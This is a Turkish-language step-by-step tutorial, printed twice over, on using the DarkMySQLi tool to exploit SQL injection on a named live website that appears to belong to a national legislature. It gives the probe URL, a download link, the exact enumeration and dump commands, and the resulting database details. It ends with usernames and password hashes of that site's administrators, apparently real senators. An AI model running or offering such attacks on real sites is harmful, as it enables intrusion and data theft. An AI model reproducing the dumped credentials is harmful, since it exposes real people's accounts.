DarkMySQLi pyhton diliyle yazılmış bir exploittir SQL açıklı sitede tabloları kolonları kullanıcı adlarını şifrelerini bulmaya yarar.
Hedef sitemizi belirleyip başlayalım
Hedefimiz==>>http://www.nassnig.org
Hatamızı alalım
http://www.nassnig.org/nass/news.php?id=452’a
Hatamız=>>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’\\’a AND publ_option = ’Y’ LIMIT 0, 1’ at line 1
Evet şimdi DarkMySQLi.py indirelim
link ==>>http://www.2shared.com/file/WQIg813E/DarkMySQLi.html
Başlayalım
DarkMySQLi.py masaüstüne atıyoruz ve terminal ekranını sırası ile komutlarımızı yazıyoruz
cd Desktop
python DarkMySQLi.py -u "buraya hedefimizi yazıyoruz" --findcol
python DarkMySQLi.py -u http://www.nassnig.org/nass/news.php?id=452 --findcol
evet bize iki tane URL verdi
[!] SQLi URL: http://www.nassnig.org/nass/news.php?id=452+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8--
[!] darkMySQLi URL: http://www.nassnig.org/nass/news.php?id=452+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de,6,7,8--
Bunlardan "darkMySQLi URL" yi kopyalıyoruz ve diğer komutumuza geçiyoruz
python DarkMySQLi.py -u "darkMySQLi URL’yi buraya yapıştırıyoruz" --full
python DarkMySQLi.py -u http://www.nassnig.org/nass/news.php?id=452+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de,6,7,8 --full
evet şimdi bazı bilgilerimizi görüyoruz versiyon database user
[+] Gathering MySQL Server Configuration...
Database: nass_nassdb
User: [email protected]
Version: 5.1.56-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 914
[Database]: nass_nassdb
[Table: Columns]
[1]activity: id,title,description,pics,uploadBy,date,publish,Pic_Caption,Summary
[2]admin_user: id,firstname,lastname,username,password,email,jurisdiction
tablo adımız => admin_user
kolonlarımız => id,firstname,lastname,username,password,email,jurisdiction
şimdi diğer komutumuzu yazalım
D ==> Database
T ==> Table
C ==> Kolon
username ve password bakalım
python DarkMySQLi.py -u http://www.nassnig.org/nass/news.php?id=452+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de,6,7,8 --dump -D nass_nassdb -T admin_user -C username,password
[’username’, ’password’]
[1] Sen.Ahmed.Ibrahim:1eefeceb38bc58bb7ef99fd9107fbd4b:
[2] senbukarabba.ibrahim:75183cb93ad0dfcb5d3a30104e010ae6:
[3] sen.gyang.datong:445462c5a6a1535a780794d72d8e98b5:
[4] sen.abaribe.harcourt:9d46845b9236af5afc712995945dce39:
Hedef sitemizi belirleyip başlayalım
Hedefimiz==>>http://www.nassnig.org
Hatamızı alalım
http://www.nassnig.org/nass/news.php?id=452’a
Hatamız=>>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’\\’a AND publ_option = ’Y’ LIMIT 0, 1’ at line 1
Evet şimdi DarkMySQLi.py indirelim
link ==>>http://www.2shared.com/file/WQIg813E/DarkMySQLi.html
Başlayalım
DarkMySQLi.py masaüstüne atıyoruz ve terminal ekranını sırası ile komutlarımızı yazıyoruz
cd Desktop
python DarkMySQLi.py -u "buraya hedefimizi yazıyoruz" --findcol
python DarkMySQLi.py -u http://www.nassnig.org/nass/news.php?id=452 --findcol
evet bize iki tane URL verdi
[!] SQLi URL: http://www.nassnig.org/nass/news.php?id=452+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8--
[!] darkMySQLi URL: http://www.nassnig.org/nass/news.php?id=452+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de,6,7,8--
Bunlardan "darkMySQLi URL" yi kopyalıyoruz ve diğer komutumuza geçiyoruz
python DarkMySQLi.py -u "darkMySQLi URL’yi buraya yapıştırıyoruz" --full
python DarkMySQLi.py -u http://www.nassnig.org/nass/news.php?id=452+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de,6,7,8 --full
evet şimdi bazı bilgilerimizi görüyoruz versiyon database user
[+] Gathering MySQL Server Configuration...
Database: nass_nassdb
User: [email protected]
Version: 5.1.56-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 914
[Database]: nass_nassdb
[Table: Columns]
[1]activity: id,title,description,pics,uploadBy,date,publish,Pic_Caption,Summary
[2]admin_user: id,firstname,lastname,username,password,email,jurisdiction
tablo adımız => admin_user
kolonlarımız => id,firstname,lastname,username,password,email,jurisdiction
şimdi diğer komutumuzu yazalım
D ==> Database
T ==> Table
C ==> Kolon
username ve password bakalım
python DarkMySQLi.py -u http://www.nassnig.org/nass/news.php?id=452+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de,6,7,8 --dump -D nass_nassdb -T admin_user -C username,password
[’username’, ’password’]
[1] Sen.Ahmed.Ibrahim:1eefeceb38bc58bb7ef99fd9107fbd4b:
[2] senbukarabba.ibrahim:75183cb93ad0dfcb5d3a30104e010ae6:
[3] sen.gyang.datong:445462c5a6a1535a780794d72d8e98b5:
[4] sen.abaribe.harcourt:9d46845b9236af5afc712995945dce39:
